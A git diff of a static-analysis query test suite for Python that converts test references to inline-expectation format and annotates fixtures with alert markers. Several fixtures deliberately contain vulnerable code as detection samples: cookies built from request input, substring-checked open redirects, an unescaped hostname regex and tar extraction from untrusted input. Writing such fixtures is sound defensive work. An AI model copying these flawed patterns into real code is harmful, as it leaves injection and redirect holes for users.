--- a/python/ql/test/query-tests/Imports/general/Imports.qlref +++ b/python/ql/test/query-tests/Imports/general/Imports.qlref @@ -1 +1,2 @@ -Imports/Imports.ql +query: Imports/Imports.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Imports/general/MultipleImport.qlref b/python/ql/test/query-tests/Imports/general/MultipleImport.qlref index a4d2195b6886..7826fb7e33c9 100644 --- a/python/ql/test/query-tests/Imports/general/MultipleImport.qlref +++ b/python/ql/test/query-tests/Imports/general/MultipleImport.qlref @@ -1 +1,2 @@ -Imports/MultipleImports.ql +query: Imports/MultipleImports.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Imports/general/UnintentionalImport.qlref b/python/ql/test/query-tests/Imports/general/UnintentionalImport.qlref index 4f1b985d5c2c..0ea9a54298fd 100644 --- a/python/ql/test/query-tests/Imports/general/UnintentionalImport.qlref +++ b/python/ql/test/query-tests/Imports/general/UnintentionalImport.qlref @@ -1 +1,2 @@ -Imports/UnintentionalImport.ql +query: Imports/UnintentionalImport.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Imports/general/imports_mutable.py b/python/ql/test/query-tests/Imports/general/imports_mutable.py index 0519a2071d8a..91efefc7e9f1 100644 --- a/python/ql/test/query-tests/Imports/general/imports_mutable.py +++ b/python/ql/test/query-tests/Imports/general/imports_mutable.py @@ -1,4 +1,4 @@ -from mutable_attr import x, y +from mutable_attr import x, y # $ Alert[py/import-of-mutable-attribute] def f(): print(x) diff --git a/python/ql/test/query-tests/Imports/general/imports_test.py b/python/ql/test/query-tests/Imports/general/imports_test.py index 4b51f8254fc4..8a4faf16a345 100644 --- a/python/ql/test/query-tests/Imports/general/imports_test.py +++ b/python/ql/test/query-tests/Imports/general/imports_test.py @@ -1,5 +1,5 @@ #Multiple imports on a single line -import module1, module2 +import module1, module2 # $ Alert[py/multiple-imports-on-line] #Cyclic import @@ -13,13 +13,13 @@ import module -for module in range(10): +for module in range(10): # $ Alert[py/import-shadowed-loop-variable] print(module) #Import * used -from module import * -from module_without_all import * +from module import * # $ Alert[py/import-star-used] +from module_without_all import * # $ Alert[py/import-star-used] Alert[py/polluting-import] #Unused import @@ -30,8 +30,8 @@ func1 #Duplicate import -import module1 -import module2 +import module1 # $ Alert[py/repeated-import] +import module2 # $ Alert[py/repeated-import] #OK -- Import used in epytext documentation. import used_in_docs @@ -62,4 +62,4 @@ def __init__(self): different # FP reported in https://github.com/github/codeql/issues/4003 -from module_that_does_not_exist import * +from module_that_does_not_exist import * # $ Alert[py/import-star-used] diff --git a/python/ql/test/query-tests/Imports/unused/UnusedImport.qlref b/python/ql/test/query-tests/Imports/unused/UnusedImport.qlref index e6bb7ab44cb0..103f075bb149 100644 --- a/python/ql/test/query-tests/Imports/unused/UnusedImport.qlref +++ b/python/ql/test/query-tests/Imports/unused/UnusedImport.qlref @@ -1 +1,2 @@ -Imports/UnusedImport.ql +query: Imports/UnusedImport.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Imports/unused/import_structure_1.py b/python/ql/test/query-tests/Imports/unused/import_structure_1.py index a76fe99f12cc..3afada1956b3 100644 --- a/python/ql/test/query-tests/Imports/unused/import_structure_1.py +++ b/python/ql/test/query-tests/Imports/unused/import_structure_1.py @@ -2,7 +2,7 @@ # lines from typing import Optional -from unknown import foo, bar +from unknown import foo, bar # $ Alert var: Optional['foo'] = None diff --git a/python/ql/test/query-tests/Imports/unused/import_structure_2.py b/python/ql/test/query-tests/Imports/unused/import_structure_2.py index 90d4255ba399..01db62d54f8c 100644 --- a/python/ql/test/query-tests/Imports/unused/import_structure_2.py +++ b/python/ql/test/query-tests/Imports/unused/import_structure_2.py @@ -3,6 +3,6 @@ from typing import Optional from unknown import foo -from unknown import bar +from unknown import bar # $ Alert var: Optional['foo'] = None diff --git a/python/ql/test/query-tests/Imports/unused/imports_test.py b/python/ql/test/query-tests/Imports/unused/imports_test.py index 71363235987c..e57d23cc2bb5 100644 --- a/python/ql/test/query-tests/Imports/unused/imports_test.py +++ b/python/ql/test/query-tests/Imports/unused/imports_test.py @@ -1,13 +1,13 @@ #Multiple imports on a single line -import module1, module2 +import module1, module2 # $ Alert #Cyclic import -import cycle +import cycle # $ Alert #Top level cyclic import -import top_level_cycle +import top_level_cycle # $ Alert #Import shadowed by loop variable @@ -24,14 +24,14 @@ #Unused import from module2 import func1 -from module2 import func2 +from module2 import func2 # $ Alert module1.func func1 #Duplicate import import module1 -import module2 +import module2 # $ Alert #OK -- Import used in epytext documentation. import used_in_docs @@ -113,6 +113,6 @@ def baz() -> Optional['subexpression_return_type']: pass -from pytest_fixtures import not_a_fixture # BAD +from pytest_fixtures import not_a_fixture # BAD # $ Alert from pytest_fixtures import fixture, wrapped_fixture # GOOD (pytest fixtures are used implicitly by pytest) from pytest_fixtures import session_fixture, wrapped_autouse_fixture # GOOD (pytest fixtures are used implicitly by pytest) diff --git a/python/ql/test/query-tests/Lexical/ToDoComment/ToDoComment.qlref b/python/ql/test/query-tests/Lexical/ToDoComment/ToDoComment.qlref index 4568a99f3882..49cef25c9fd4 100644 --- a/python/ql/test/query-tests/Lexical/ToDoComment/ToDoComment.qlref +++ b/python/ql/test/query-tests/Lexical/ToDoComment/ToDoComment.qlref @@ -1 +1,2 @@ -Lexical/ToDoComment.ql \ No newline at end of file +query: Lexical/ToDoComment.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Lexical/ToDoComment/todo.py b/python/ql/test/query-tests/Lexical/ToDoComment/todo.py index 5e02882924b6..e29370ad3279 100644 --- a/python/ql/test/query-tests/Lexical/ToDoComment/todo.py +++ b/python/ql/test/query-tests/Lexical/ToDoComment/todo.py @@ -1 +1 @@ -# TO DO -- (Nothing "to do" -- this is a test for TO DO comments) +# TO DO -- (Nothing "to do" -- this is a test for TO DO comments) # $ Alert diff --git a/python/ql/test/query-tests/Lexical/commented_out_code/CommentedOutCode.qlref b/python/ql/test/query-tests/Lexical/commented_out_code/CommentedOutCode.qlref index 6fe55e0fa940..39456a2013e7 100644 --- a/python/ql/test/query-tests/Lexical/commented_out_code/CommentedOutCode.qlref +++ b/python/ql/test/query-tests/Lexical/commented_out_code/CommentedOutCode.qlref @@ -1 +1,2 @@ -Lexical/CommentedOutCode.ql +query: Lexical/CommentedOutCode.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Lexical/commented_out_code/FCommentedOutCode.qlref b/python/ql/test/query-tests/Lexical/commented_out_code/FCommentedOutCode.qlref index 2776efbcfd3e..cb0c813f0095 100644 --- a/python/ql/test/query-tests/Lexical/commented_out_code/FCommentedOutCode.qlref +++ b/python/ql/test/query-tests/Lexical/commented_out_code/FCommentedOutCode.qlref @@ -1 +1 @@ -Lexical/FCommentedOutCode.ql +query: Lexical/FCommentedOutCode.ql diff --git a/python/ql/test/query-tests/Lexical/commented_out_code/test.py b/python/ql/test/query-tests/Lexical/commented_out_code/test.py index 067855b67447..685a2080f6c2 100644 --- a/python/ql/test/query-tests/Lexical/commented_out_code/test.py +++ b/python/ql/test/query-tests/Lexical/commented_out_code/test.py @@ -13,7 +13,7 @@ def f(x): if x: do_something() #else: - # do_something_else() + # do_something_else() # $ Alert # Some non-code comments. # Space immediately after scope start and between functions. @@ -69,7 +69,7 @@ def f(x): # # #def m(): -# pass +# pass # $ Alert # # # @@ -82,7 +82,7 @@ def f(x): #except Exception: # pass #except: -# pass +# pass # $ Alert def a_function_to_break_up_comments(): pass diff --git a/python/ql/test/query-tests/Metrics/cyclo/CyclomaticComplexity.qlref b/python/ql/test/query-tests/Metrics/cyclo/CyclomaticComplexity.qlref index c74ae215bb40..8e150c5a5c8a 100644 --- a/python/ql/test/query-tests/Metrics/cyclo/CyclomaticComplexity.qlref +++ b/python/ql/test/query-tests/Metrics/cyclo/CyclomaticComplexity.qlref @@ -1 +1 @@ -Metrics/CyclomaticComplexity.ql +query: Metrics/CyclomaticComplexity.ql diff --git a/python/ql/test/query-tests/Metrics/functions/FunctionStatementNestingDepth.qlref b/python/ql/test/query-tests/Metrics/functions/FunctionStatementNestingDepth.qlref index 797f223792f2..5be0496cf087 100644 --- a/python/ql/test/query-tests/Metrics/functions/FunctionStatementNestingDepth.qlref +++ b/python/ql/test/query-tests/Metrics/functions/FunctionStatementNestingDepth.qlref @@ -1 +1 @@ -Metrics/FunctionStatementNestingDepth.ql \ No newline at end of file +query: Metrics/FunctionStatementNestingDepth.ql diff --git a/python/ql/test/query-tests/Metrics/imports/DirectImports.qlref b/python/ql/test/query-tests/Metrics/imports/DirectImports.qlref index 84fe2dc5805b..0878b8892634 100644 --- a/python/ql/test/query-tests/Metrics/imports/DirectImports.qlref +++ b/python/ql/test/query-tests/Metrics/imports/DirectImports.qlref @@ -1 +1 @@ -Metrics/DirectImports.ql +query: Metrics/DirectImports.ql diff --git a/python/ql/test/query-tests/Metrics/imports/TransitiveImports.qlref b/python/ql/test/query-tests/Metrics/imports/TransitiveImports.qlref index 1bacdce45c28..35e369b89b41 100644 --- a/python/ql/test/query-tests/Metrics/imports/TransitiveImports.qlref +++ b/python/ql/test/query-tests/Metrics/imports/TransitiveImports.qlref @@ -1 +1 @@ -Metrics/TransitiveImports.ql \ No newline at end of file +query: Metrics/TransitiveImports.ql diff --git a/python/ql/test/query-tests/Metrics/lines/CommentRatio.qlref b/python/ql/test/query-tests/Metrics/lines/CommentRatio.qlref index 9c3179ac5033..a8be2d84cc5d 100644 --- a/python/ql/test/query-tests/Metrics/lines/CommentRatio.qlref +++ b/python/ql/test/query-tests/Metrics/lines/CommentRatio.qlref @@ -1 +1 @@ -Metrics/CommentRatio.ql +query: Metrics/CommentRatio.ql diff --git a/python/ql/test/query-tests/Metrics/lines/FLinesOfCode.qlref b/python/ql/test/query-tests/Metrics/lines/FLinesOfCode.qlref index 2ac69b8f67a8..6a2c24b94b1d 100644 --- a/python/ql/test/query-tests/Metrics/lines/FLinesOfCode.qlref +++ b/python/ql/test/query-tests/Metrics/lines/FLinesOfCode.qlref @@ -1 +1 @@ -Metrics/FLinesOfCode.ql +query: Metrics/FLinesOfCode.ql diff --git a/python/ql/test/query-tests/Metrics/ratios/CommentRatio.qlref b/python/ql/test/query-tests/Metrics/ratios/CommentRatio.qlref index dc273e169828..a8be2d84cc5d 100644 --- a/python/ql/test/query-tests/Metrics/ratios/CommentRatio.qlref +++ b/python/ql/test/query-tests/Metrics/ratios/CommentRatio.qlref @@ -1 +1 @@ -Metrics/CommentRatio.ql \ No newline at end of file +query: Metrics/CommentRatio.ql diff --git a/python/ql/test/query-tests/Metrics/ratios/DocStringRatio.qlref b/python/ql/test/query-tests/Metrics/ratios/DocStringRatio.qlref index ec66c5cdc834..c8c5812818f6 100644 --- a/python/ql/test/query-tests/Metrics/ratios/DocStringRatio.qlref +++ b/python/ql/test/query-tests/Metrics/ratios/DocStringRatio.qlref @@ -1 +1 @@ -Metrics/DocStringRatio.ql \ No newline at end of file +query: Metrics/DocStringRatio.ql diff --git a/python/ql/test/query-tests/Metrics/tests/FNumberOfTests.qlref b/python/ql/test/query-tests/Metrics/tests/FNumberOfTests.qlref index e7301c3b2302..46d66e549876 100644 --- a/python/ql/test/query-tests/Metrics/tests/FNumberOfTests.qlref +++ b/python/ql/test/query-tests/Metrics/tests/FNumberOfTests.qlref @@ -1 +1 @@ -Metrics/FNumberOfTests.ql \ No newline at end of file +query: Metrics/FNumberOfTests.ql diff --git a/python/ql/test/query-tests/Security/CWE-020-CookieInjection/CookieInjection.expected b/python/ql/test/query-tests/Security/CWE-020-CookieInjection/CookieInjection.expected index cf3a06ac7c8f..6e9c8ff47dc8 100644 --- a/python/ql/test/query-tests/Security/CWE-020-CookieInjection/CookieInjection.expected +++ b/python/ql/test/query-tests/Security/CWE-020-CookieInjection/CookieInjection.expected @@ -1,3 +1,7 @@ +#select +| django_tests.py:6:21:6:43 | ControlFlowNode for Attribute() | django_tests.py:4:25:4:31 | ControlFlowNode for request | django_tests.py:6:21:6:43 | ControlFlowNode for Attribute() | Cookie is constructed from a $@. | django_tests.py:4:25:4:31 | ControlFlowNode for request | user-supplied input | +| django_tests.py:7:21:7:44 | ControlFlowNode for Attribute() | django_tests.py:4:25:4:31 | ControlFlowNode for request | django_tests.py:7:21:7:44 | ControlFlowNode for Attribute() | Cookie is constructed from a $@. | django_tests.py:4:25:4:31 | ControlFlowNode for request | user-supplied input | +| django_tests.py:13:30:13:100 | ControlFlowNode for Fstring | django_tests.py:11:26:11:32 | ControlFlowNode for request | django_tests.py:13:30:13:100 | ControlFlowNode for Fstring | Cookie is constructed from a $@. | django_tests.py:11:26:11:32 | ControlFlowNode for request | user-supplied input | edges | django_tests.py:4:25:4:31 | ControlFlowNode for request | django_tests.py:6:21:6:31 | ControlFlowNode for Attribute | provenance | AdditionalTaintStep | | django_tests.py:4:25:4:31 | ControlFlowNode for request | django_tests.py:7:21:7:31 | ControlFlowNode for Attribute | provenance | AdditionalTaintStep | @@ -22,7 +26,3 @@ nodes | django_tests.py:13:59:13:69 | ControlFlowNode for Attribute | semmle.label | ControlFlowNode for Attribute | | django_tests.py:13:59:13:82 | ControlFlowNode for Attribute() | semmle.label | ControlFlowNode for Attribute() | subpaths -#select -| django_tests.py:6:21:6:43 | ControlFlowNode for Attribute() | django_tests.py:4:25:4:31 | ControlFlowNode for request | django_tests.py:6:21:6:43 | ControlFlowNode for Attribute() | Cookie is constructed from a $@. | django_tests.py:4:25:4:31 | ControlFlowNode for request | user-supplied input | -| django_tests.py:7:21:7:44 | ControlFlowNode for Attribute() | django_tests.py:4:25:4:31 | ControlFlowNode for request | django_tests.py:7:21:7:44 | ControlFlowNode for Attribute() | Cookie is constructed from a $@. | django_tests.py:4:25:4:31 | ControlFlowNode for request | user-supplied input | -| django_tests.py:13:30:13:100 | ControlFlowNode for Fstring | django_tests.py:11:26:11:32 | ControlFlowNode for request | django_tests.py:13:30:13:100 | ControlFlowNode for Fstring | Cookie is constructed from a $@. | django_tests.py:11:26:11:32 | ControlFlowNode for request | user-supplied input | diff --git a/python/ql/test/query-tests/Security/CWE-020-CookieInjection/CookieInjection.qlref b/python/ql/test/query-tests/Security/CWE-020-CookieInjection/CookieInjection.qlref index a405c564b1bf..788c1b424ff5 100644 --- a/python/ql/test/query-tests/Security/CWE-020-CookieInjection/CookieInjection.qlref +++ b/python/ql/test/query-tests/Security/CWE-020-CookieInjection/CookieInjection.qlref @@ -1 +1,2 @@ -Security/CWE-020/CookieInjection.ql \ No newline at end of file +query: Security/CWE-020/CookieInjection.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Security/CWE-020-CookieInjection/django_tests.py b/python/ql/test/query-tests/Security/CWE-020-CookieInjection/django_tests.py index e070f5cab82b..b016f98dc831 100644 --- a/python/ql/test/query-tests/Security/CWE-020-CookieInjection/django_tests.py +++ b/python/ql/test/query-tests/Security/CWE-020-CookieInjection/django_tests.py @@ -1,16 +1,16 @@ import django.http from django.urls import path -def django_response_bad(request): +def django_response_bad(request): # $ Source resp = django.http.HttpResponse() - resp.set_cookie(request.GET.get("name"), # BAD: Cookie is constructed from user input - request.GET.get("value")) + resp.set_cookie(request.GET.get("name"), # BAD: Cookie is constructed from user input # $ Alert + request.GET.get("value")) # $ Alert return resp -def django_response_bad2(request): +def django_response_bad2(request): # $ Source response = django.http.HttpResponse() - response['Set-Cookie'] = f"{request.GET.get('name')}={request.GET.get('value')}; SameSite=None;" # BAD: Cookie header is constructed from user input. + response['Set-Cookie'] = f"{request.GET.get('name')}={request.GET.get('value')}; SameSite=None;" # BAD: Cookie header is constructed from user input. # $ Alert return response # fake setup, you can't actually run this diff --git a/python/ql/test/query-tests/Security/CWE-020-ExternalAPIs/ExternalAPIsUsedWithUntrustedData.qlref b/python/ql/test/query-tests/Security/CWE-020-ExternalAPIs/ExternalAPIsUsedWithUntrustedData.qlref index c91bf44f815c..34ac0b640147 100644 --- a/python/ql/test/query-tests/Security/CWE-020-ExternalAPIs/ExternalAPIsUsedWithUntrustedData.qlref +++ b/python/ql/test/query-tests/Security/CWE-020-ExternalAPIs/ExternalAPIsUsedWithUntrustedData.qlref @@ -1 +1 @@ -Security/CWE-020-ExternalAPIs/ExternalAPIsUsedWithUntrustedData.ql +query: Security/CWE-020-ExternalAPIs/ExternalAPIsUsedWithUntrustedData.ql diff --git a/python/ql/test/query-tests/Security/CWE-020-ExternalAPIs/UntrustedDataToExternalAPI.expected b/python/ql/test/query-tests/Security/CWE-020-ExternalAPIs/UntrustedDataToExternalAPI.expected index 7f83ceae8fe0..69039d12c4d1 100644 --- a/python/ql/test/query-tests/Security/CWE-020-ExternalAPIs/UntrustedDataToExternalAPI.expected +++ b/python/ql/test/query-tests/Security/CWE-020-ExternalAPIs/UntrustedDataToExternalAPI.expected @@ -1,3 +1,10 @@ +#select +| test.py:15:36:15:39 | ControlFlowNode for data | test.py:5:26:5:32 | ControlFlowNode for ImportMember | test.py:15:36:15:39 | ControlFlowNode for data | Call to hmac.new [position 1] with untrusted data from $@. | test.py:5:26:5:32 | ControlFlowNode for ImportMember | ControlFlowNode for ImportMember | +| test.py:25:44:25:47 | ControlFlowNode for data | test.py:5:26:5:32 | ControlFlowNode for ImportMember | test.py:25:44:25:47 | ControlFlowNode for data | Call to hmac.new [keyword msg] with untrusted data from $@. | test.py:5:26:5:32 | ControlFlowNode for ImportMember | ControlFlowNode for ImportMember | +| test.py:35:10:35:13 | ControlFlowNode for data | test.py:5:26:5:32 | ControlFlowNode for ImportMember | test.py:35:10:35:13 | ControlFlowNode for data | Call to unknown.lib.func [position 0] with untrusted data from $@. | test.py:5:26:5:32 | ControlFlowNode for ImportMember | ControlFlowNode for ImportMember | +| test.py:36:13:36:16 | ControlFlowNode for data | test.py:5:26:5:32 | ControlFlowNode for ImportMember | test.py:36:13:36:16 | ControlFlowNode for data | Call to unknown.lib.func [keyword kw] with untrusted data from $@. | test.py:5:26:5:32 | ControlFlowNode for ImportMember | ControlFlowNode for ImportMember | +| test.py:43:22:43:25 | ControlFlowNode for data | test.py:5:26:5:32 | ControlFlowNode for ImportMember | test.py:43:22:43:25 | ControlFlowNode for data | Call to unknown.lib.func [position 0] with untrusted data from $@. | test.py:5:26:5:32 | ControlFlowNode for ImportMember | ControlFlowNode for ImportMember | +| test.py:44:25:44:28 | ControlFlowNode for data | test.py:5:26:5:32 | ControlFlowNode for ImportMember | test.py:44:25:44:28 | ControlFlowNode for data | Call to unknown.lib.func [keyword kw] with untrusted data from $@. | test.py:5:26:5:32 | ControlFlowNode for ImportMember | ControlFlowNode for ImportMember | edges | test.py:5:26:5:32 | ControlFlowNode for ImportMember | test.py:5:26:5:32 | ControlFlowNode for request | provenance | | | test.py:5:26:5:32 | ControlFlowNode for request | test.py:13:16:13:22 | ControlFlowNode for request | provenance | | @@ -68,10 +75,3 @@ nodes | test.py:54:12:54:35 | ControlFlowNode for Attribute() | semmle.label | ControlFlowNode for Attribute() | | test.py:55:17:55:20 | ControlFlowNode for data | semmle.label | ControlFlowNode for data | subpaths -#select -| test.py:15:36:15:39 | ControlFlowNode for data | test.py:5:26:5:32 | ControlFlowNode for ImportMember | test.py:15:36:15:39 | ControlFlowNode for data | Call to hmac.new [position 1] with untrusted data from $@. | test.py:5:26:5:32 | ControlFlowNode for ImportMember | ControlFlowNode for ImportMember | -| test.py:25:44:25:47 | ControlFlowNode for data | test.py:5:26:5:32 | ControlFlowNode for ImportMember | test.py:25:44:25:47 | ControlFlowNode for data | Call to hmac.new [keyword msg] with untrusted data from $@. | test.py:5:26:5:32 | ControlFlowNode for ImportMember | ControlFlowNode for ImportMember | -| test.py:35:10:35:13 | ControlFlowNode for data | test.py:5:26:5:32 | ControlFlowNode for ImportMember | test.py:35:10:35:13 | ControlFlowNode for data | Call to unknown.lib.func [position 0] with untrusted data from $@. | test.py:5:26:5:32 | ControlFlowNode for ImportMember | ControlFlowNode for ImportMember | -| test.py:36:13:36:16 | ControlFlowNode for data | test.py:5:26:5:32 | ControlFlowNode for ImportMember | test.py:36:13:36:16 | ControlFlowNode for data | Call to unknown.lib.func [keyword kw] with untrusted data from $@. | test.py:5:26:5:32 | ControlFlowNode for ImportMember | ControlFlowNode for ImportMember | -| test.py:43:22:43:25 | ControlFlowNode for data | test.py:5:26:5:32 | ControlFlowNode for ImportMember | test.py:43:22:43:25 | ControlFlowNode for data | Call to unknown.lib.func [position 0] with untrusted data from $@. | test.py:5:26:5:32 | ControlFlowNode for ImportMember | ControlFlowNode for ImportMember | -| test.py:44:25:44:28 | ControlFlowNode for data | test.py:5:26:5:32 | ControlFlowNode for ImportMember | test.py:44:25:44:28 | ControlFlowNode for data | Call to unknown.lib.func [keyword kw] with untrusted data from $@. | test.py:5:26:5:32 | ControlFlowNode for ImportMember | ControlFlowNode for ImportMember | diff --git a/python/ql/test/query-tests/Security/CWE-020-ExternalAPIs/UntrustedDataToExternalAPI.qlref b/python/ql/test/query-tests/Security/CWE-020-ExternalAPIs/UntrustedDataToExternalAPI.qlref index 03c06feeec88..fbacbf2a07a0 100644 --- a/python/ql/test/query-tests/Security/CWE-020-ExternalAPIs/UntrustedDataToExternalAPI.qlref +++ b/python/ql/test/query-tests/Security/CWE-020-ExternalAPIs/UntrustedDataToExternalAPI.qlref @@ -1 +1,2 @@ -Security/CWE-020-ExternalAPIs/UntrustedDataToExternalAPI.ql +query: Security/CWE-020-ExternalAPIs/UntrustedDataToExternalAPI.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Security/CWE-020-ExternalAPIs/test.py b/python/ql/test/query-tests/Security/CWE-020-ExternalAPIs/test.py index 18b46298d8af..f2857914c03b 100644 --- a/python/ql/test/query-tests/Security/CWE-020-ExternalAPIs/test.py +++ b/python/ql/test/query-tests/Security/CWE-020-ExternalAPIs/test.py @@ -2,7 +2,7 @@ import hmac import base64 -from flask import Flask, request, make_response +from flask import Flask, request, make_response # $ Source app = Flask(__name__) SECRET_KEY = b"SECRET_KEY" @@ -12,7 +12,7 @@ def hmac_example(): data_raw = request.args.get("data").encode('utf-8') data = base64.decodebytes(data_raw) - my_hmac = hmac.new(SECRET_KEY, data, hashlib.sha256) + my_hmac = hmac.new(SECRET_KEY, data, hashlib.sha256) # $ Alert digest = my_hmac.digest() print(digest) return "ok" @@ -22,7 +22,7 @@ def hmac_example(): def hmac_example2(): data_raw = request.args.get("data").encode('utf-8') data = base64.decodebytes(data_raw) - my_hmac = hmac.new(key=SECRET_KEY, msg=data, digestmod=hashlib.sha256) + my_hmac = hmac.new(key=SECRET_KEY, msg=data, digestmod=hashlib.sha256) # $ Alert digest = my_hmac.digest() print(digest) return "ok" @@ -32,16 +32,16 @@ def hmac_example2(): def unknown_lib_1(): from unknown.lib import func data = request.args.get("data") - func(data) - func(kw=data) + func(data) # $ Alert + func(kw=data) # $ Alert @app.route("/unknown-lib-2") def unknown_lib_2(): import unknown.lib data = request.args.get("data") - unknown.lib.func(data) - unknown.lib.func(kw=data) + unknown.lib.func(data) # $ Alert + unknown.lib.func(kw=data) # $ Alert def handle_this(arg, application = None): diff --git a/python/ql/test/query-tests/Security/CWE-020-IncompleteHostnameRegExp/IncompleteHostnameRegExp.qlref b/python/ql/test/query-tests/Security/CWE-020-IncompleteHostnameRegExp/IncompleteHostnameRegExp.qlref index e818d9472521..d1afa3858252 100644 --- a/python/ql/test/query-tests/Security/CWE-020-IncompleteHostnameRegExp/IncompleteHostnameRegExp.qlref +++ b/python/ql/test/query-tests/Security/CWE-020-IncompleteHostnameRegExp/IncompleteHostnameRegExp.qlref @@ -1 +1,2 @@ -Security/CWE-020/IncompleteHostnameRegExp.ql \ No newline at end of file +query: Security/CWE-020/IncompleteHostnameRegExp.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Security/CWE-020-IncompleteHostnameRegExp/hosttest.py b/python/ql/test/query-tests/Security/CWE-020-IncompleteHostnameRegExp/hosttest.py index ca7f7094a8c9..e2e90e651424 100644 --- a/python/ql/test/query-tests/Security/CWE-020-IncompleteHostnameRegExp/hosttest.py +++ b/python/ql/test/query-tests/Security/CWE-020-IncompleteHostnameRegExp/hosttest.py @@ -3,7 +3,7 @@ app = Flask(__name__) -UNSAFE_REGEX = re.compile("(www|beta).example.com/") +UNSAFE_REGEX = re.compile("(www|beta).example.com/") # $ Alert SAFE_REGEX = re.compile(r"(www|beta)\.example\.com/") @app.route('/some/path/bad') diff --git a/python/ql/test/query-tests/Security/CWE-020-IncompleteUrlSubstringSanitization/IncompleteUrlSubstringSanitization.qlref b/python/ql/test/query-tests/Security/CWE-020-IncompleteUrlSubstringSanitization/IncompleteUrlSubstringSanitization.qlref index 3fa6794419d7..1c4c23821534 100644 --- a/python/ql/test/query-tests/Security/CWE-020-IncompleteUrlSubstringSanitization/IncompleteUrlSubstringSanitization.qlref +++ b/python/ql/test/query-tests/Security/CWE-020-IncompleteUrlSubstringSanitization/IncompleteUrlSubstringSanitization.qlref @@ -1 +1,2 @@ -Security/CWE-020/IncompleteUrlSubstringSanitization.ql \ No newline at end of file +query: Security/CWE-020/IncompleteUrlSubstringSanitization.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Security/CWE-020-IncompleteUrlSubstringSanitization/urltest.py b/python/ql/test/query-tests/Security/CWE-020-IncompleteUrlSubstringSanitization/urltest.py index 308b946603b8..bc59d83819ac 100644 --- a/python/ql/test/query-tests/Security/CWE-020-IncompleteUrlSubstringSanitization/urltest.py +++ b/python/ql/test/query-tests/Security/CWE-020-IncompleteUrlSubstringSanitization/urltest.py @@ -6,13 +6,13 @@ @app.route('/some/path/bad1') def unsafe1(request): target = request.args.get('target', '') - if "example.com" in target: + if "example.com" in target: # $ Alert return redirect(target) @app.route('/some/path/bad2') def unsafe2(request): target = request.args.get('target', '') - if target.endswith("example.com"): + if target.endswith("example.com"): # $ Alert return redirect(target) diff --git a/python/ql/test/query-tests/Security/CWE-020-SuspiciousRegexpRange/OverlyLargeRangeQuery.qlref b/python/ql/test/query-tests/Security/CWE-020-SuspiciousRegexpRange/OverlyLargeRangeQuery.qlref index 77b5c92707f9..c42315c4550e 100644 --- a/python/ql/test/query-tests/Security/CWE-020-SuspiciousRegexpRange/OverlyLargeRangeQuery.qlref +++ b/python/ql/test/query-tests/Security/CWE-020-SuspiciousRegexpRange/OverlyLargeRangeQuery.qlref @@ -1 +1,2 @@ -Security/CWE-020/OverlyLargeRange.ql +query: Security/CWE-020/OverlyLargeRange.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Security/CWE-020-SuspiciousRegexpRange/test.py b/python/ql/test/query-tests/Security/CWE-020-SuspiciousRegexpRange/test.py index 43380ccef0db..d24dcef864d0 100644 --- a/python/ql/test/query-tests/Security/CWE-020-SuspiciousRegexpRange/test.py +++ b/python/ql/test/query-tests/Security/CWE-020-SuspiciousRegexpRange/test.py @@ -1,10 +1,10 @@ import re -overlap1 = re.compile(r'^[0-93-5]$') # NOT OK +overlap1 = re.compile(r'^[0-93-5]$') # NOT OK # $ Alert -overlap2 = re.compile(r'[A-ZA-z]') # NOT OK +overlap2 = re.compile(r'[A-ZA-z]') # NOT OK # $ Alert -isEmpty = re.compile(r'^[z-a]$') # NOT OK +isEmpty = re.compile(r'^[z-a]$') # NOT OK # $ Alert isAscii = re.compile(r'^[\x00-\x7F]*$') # OK @@ -14,18 +14,18 @@ NON_ALPHANUMERIC_REGEXP = re.compile(r'([^\#-~| |!])') # OK -smallOverlap = re.compile(r'[0-9a-fA-f]') # NOT OK +smallOverlap = re.compile(r'[0-9a-fA-f]') # NOT OK # $ Alert -weirdRange = re.compile(r'[$-`]') # NOT OK +weirdRange = re.compile(r'[$-`]') # NOT OK # $ Alert -keywordOperator = re.compile(r'[!\~\*\/%+-<>\^|=&]') # NOT OK +keywordOperator = re.compile(r'[!\~\*\/%+-<>\^|=&]') # NOT OK # $ Alert -notYoutube = re.compile(r'youtu\.be\/[a-z1-9.-_]+') # NOT OK +notYoutube = re.compile(r'youtu\.be\/[a-z1-9.-_]+') # NOT OK # $ Alert -numberToLetter = re.compile(r'[7-F]') # NOT OK +numberToLetter = re.compile(r'[7-F]') # NOT OK # $ Alert -overlapsWithClass1 = re.compile(r'[0-9\d]') # NOT OK +overlapsWithClass1 = re.compile(r'[0-9\d]') # NOT OK # $ Alert -overlapsWithClass2 = re.compile(r'[\w,.-?:*+]') # NOT OK +overlapsWithClass2 = re.compile(r'[\w,.-?:*+]') # NOT OK # $ Alert -unicodeStuff = re.compile('[\U0001D173-\U0001D17A\U000E0020-\U000E007F\U000e0001]') # NOT OK \ No newline at end of file +unicodeStuff = re.compile('[\U0001D173-\U0001D17A\U000E0020-\U000E007F\U000e0001]') # NOT OK # $ Alert \ No newline at end of file diff --git a/python/ql/test/query-tests/Security/CWE-022-TarSlip/TarSlip.expected b/python/ql/test/query-tests/Security/CWE-022-TarSlip/TarSlip.expected index 6f98ea1aae2b..abdccddd631b 100644 --- a/python/ql/test/query-tests/Security/CWE-022-TarSlip/TarSlip.expected +++ b/python/ql/test/query-tests/Security/CWE-022-TarSlip/TarSlip.expected @@ -1,3 +1,13 @@ +#select +| tarslip.py:15:1:15:3 | ControlFlowNode for tar | tarslip.py:14:7:14:39 | ControlFlowNode for Attribute() | tarslip.py:15:1:15:3 | ControlFlowNode for tar | This file extraction depends on a $@. | tarslip.py:14:7:14:39 | ControlFlowNode for Attribute() | potentially untrusted source 